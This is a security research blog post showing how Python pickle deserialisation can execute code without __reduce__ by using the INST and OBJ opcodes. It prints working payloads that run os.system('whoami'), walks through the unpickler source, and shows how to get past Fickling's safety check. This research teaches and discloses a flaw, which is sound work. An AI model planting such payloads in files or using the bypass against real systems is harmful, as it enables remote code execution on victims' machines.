Python Pickle RCE without __reduce__
Tags: #random
2022-12-23
“Every single pickle deserialisation payload uses
__reduce__
… I wonder if it’s possible to get RCE without it”
And that’s how I nerdsniped myself and lost 5h of my life.
TL;DR
Yes, it’s possible, here are two functional payloads:
>>> inst_bomb
b'(S"whoami"\nios\nsystem\n.'
>>> pickletools.dis(inst_bomb)
0: ( MARK
1: S STRING 'whoami'
11: i INST 'os system' (MARK at 0)
22: . STOP
highest protocol among opcodes = 0
>>> pickle.loads(inst_bomb)
alol
>>> obj_bomb
b'(cos\nsystem\nS"whoami"\no.'
>>> pickletools.dis(obj_bomb)
0: ( MARK
1: c GLOBAL 'os system'
12: S STRING 'whoami'
22: o OBJ (MARK at 0)
23: . STOP
highest protocol among opcodes = 1
>>> pickle.loads(obj_bomb)
alol
Foreword
This blog post won’t explain:
- What (de)serialization is and the vulnerabilities that can arise, PortSwigger’s Web Security Academy has already done a great job at that.
- What the
pickle
module is, its inner workings have already been thoroughly explained in this great blog post and inpickletools
’ documentation.
However, what it will detail is how the REDUCE
primitive could have been found and how to find novel (to my knowledge) exploit primitives.
For some additional reading, here are links to the best research done on pickle deserialization.
- Dangerous pickles — malicious python serialization [blog]: Already linked above, the best article to date on
pickle
deserialization, very well explained. - Never a dill moment: Exploiting machine learning pickle files [blog] [conf]: On the resurgence in the use of
pickle
for Machine Learning and its security implications. - Pain Pickle: Systemically bypassing restricted unpickle [conf] [slides]: Great research (in Cantonese) on how to systematically bypass
RestrictedUnpickler
s to achieve RCE.
The REDUCE primitive
Before looking for new exploit paths it’s a good idea to first understand how the existing one works by diving into the source code.
NB: Pre-existing comments in the source code have been removed for the sake of clarity.
When a REDUCE
opcode is read, the main fetch-decode-execute loop calls the corresponding function (load_reduce
).
def load_reduce(self):
stack = self.stack
args = stack.pop() # pop args (tuple) top of the stack
func = stack[-1] # get value from top of the stack (function)
stack[-1] = func(*args) # call func with args -> RCE
# arg1(*arg2) is a pattern that will come back later.
The load_reduce
function requires a function to have already been pushed onto the stack. There are a few ways of doing this, the easiest being to use either the GLOBAL
or STACK_GLOBAL
instructions. Both corresponding functions work in a very similar way, load_global
reads the module
/name
variables as strings whilst load_stack_global
loads the values off of the stack.
def load_global(self):
module = self.readline()[:-1].decode("utf-8") # read module string
name = self.readline()[:-1].decode("utf-8") # read name string
klass = self.find_class(module, name) # call find_class
self.append(klass) # append result to stack
The call to find_class
seems to be the important part of the function so let’s investigate.
N.B: Since the PROTO opcode (protocol version, 0 by default) is optional and has no real influence on the program flow it has been omitted from the given payloads for the sake of brevity.
def find_class(self, module, name):
sys.audit('pickle.find_class', module, name)
if self.proto < 3 and self.fix_imports:
# fix the imports
__import__(module, level=0) # import the module
if self.proto >= 4: # both branchs do the same thing
return _getattribute(sys.modules[module], name)[0]
else:
return getattr(sys.modules[module], name) # return module.function
Being able to import functions and specific modules is an extremely useful primitive, thus the search for a REDUCE-less payload started by looking for functions calling find_class
.
The INST primitive
The only other interesting function that calls find_class
is the load_inst
function.
def load_inst(self):
module = self.readline()[:-1].decode("ascii") # read module string
name = self.readline()[:-1].decode("ascii") # read name string
klass = self.find_class(module, name) # call find_class
self._instantiate(klass, self.pop_mark()) # call _instantiate
The function ends with a call to _instantiate
.
def _instantiate(self, klass, args):
if (args or not isinstance(klass, type) or
hasattr(klass, "__getinitargs__")):
try:
value = klass(*args) # the arg1(*arg2) pattern reemerges
except TypeError as err:
raise TypeError("in constructor for %s: %s" %
(klass.__name__, str(err)), sys.exc_info()[2])
else:
value = klass.__new__(klass)
self.append(value)
Just like with load_reduce
, _instantiate
takes a function (klass
) and a tuple (args
) as parameters and calls the function with the tuple’s values as arguments (func(*args)
), allowing for arbitrary code execution. Below is an annotated example payload:
>>> pickletools.dis(b'(S"whoami"\nios\nsystem\n.', annotate=1)
0: ( MARK Push markobject onto the stack.
1: S STRING 'whoami' Push a Python string object.
11: i INST 'os system' (MARK at 0) Build a class instance.
22: . STOP Stop the unpickling machine.
highest protocol among opcodes = 0
>>> pickle.loads(b'(S"whoami"\nios\nsystem\n.')
alol
The OBJ primitive
The search for other functions calling _instantiate
yielded only a single other function: load_obj
.
def load_obj(self):
args = self.pop_mark()
cls = args.pop(0)
self._instantiate(cls, args)
It works in a very similar way to load_reduce
: the function gets two variables, one containing a function and the other containing a tuple of arguments, and calls the function with the arguments. Below is an annotated example payload:
>>> pickletools.dis(b'(cos\nsystem\nS"whoami"\no.')
0: ( MARK Push markobject onto the stack.
1: c GLOBAL 'os system' Push a global object (module.attr) on the stack.
12: S STRING 'whoami' Push a Python string object.
22: o OBJ (MARK at 0) Build a class instance.
23: . STOP Stop the unpickling machine.
highest protocol among opcodes = 1
>>> pickle.loads(b'(cos\nsystem\nS"whoami"\no.')
alol
PS: Fickling won’t save pickling
Fickling is a Python pickle
decompiler and static analyzer released by Trailofbits. It aims to help reverse-engineer malicious pickle files, but it also offers the possibility to try and identify them with the --check-safety
flag.
Disclaimer: Consistently identifying malicious code is, to put it lightly, pretty hard (and I’d be jobless if it wasn’t). Contrary to what the flag’s name suggests, Fickling isn’t meant to and shouldn’t be used to triage pickle files, it’s meant to reverse-engineer them.
As a pickle connoisseur and bypass enjoyer, I saw fickling’s --check-safety
and thought: “Oh! Now this looks interesting … I’m sure I can bypass it”. Turns out it wasn’t very hard :(
This is the function that checks for unsafe imports:
def unsafe_imports(self) -> Iterator[Union[ast.Import, ast.ImportFrom]]:
for node in self.properties.imports:
if node.module in ("__builtin__", "os", "subprocess", "sys",
"builtins", "socket"):
yield node
# [...]
It checks for the os
module, it’s being used in the payload, but why isn’t it being flagged? Here’s why:
$ fickling rce.pkl
from posix import system # `posix` on Linux/MacOS and `nt` on Windows
_var0 = system('whoami')
result = _var0
“On Unix, the os module provides a superset of the posix interface.” - docs.python.org
When the pickle was dumped, os
was replaced with the OS-specific library!
Even though the “safety check” wasn’t meant to be Fickling’s flagship feature they probably should have tested it on the most popular payload.
All and all, securing the pickle
module is like trying to secure a pyjail, you don’t. You just delete the repo, burn the server and move on to something secure by design.
PPS: Irreductible
The premise of this blog post served as a challenge (Irreductible) for the HeroCTF v5 CTF. Since there was, to my knowledge, no documentation on the INST/OBJ techniques (except for this blog post, which was replaced with a rickroll for the duration of the CTF), I was hoping to give the players a hard time. Unbeknownst to me, there were quite a few of them, they were just all writen in Mandarin;(
I can’t complain though, I got free documentation out of it and still managed to make players suffer as only 7 teams solved the challenge, yay!
Additionnal documentation:
- https://goodapple.top/archives/1069: nice and detailed, even has a paragraph on bypassing the check for
REDUCE
- https://xz.aliyun.com/t/7012: mentions
INST
/OBJ
and links a Python to Pickle converter - https://github.com/gousaiyang/pickleassem: a pickle bytecode assembler, could be used to craft the payload (instead of handcrafting it)
I finally get what our pwn guys mean when they say that learning chinese is a viable CTF strategy.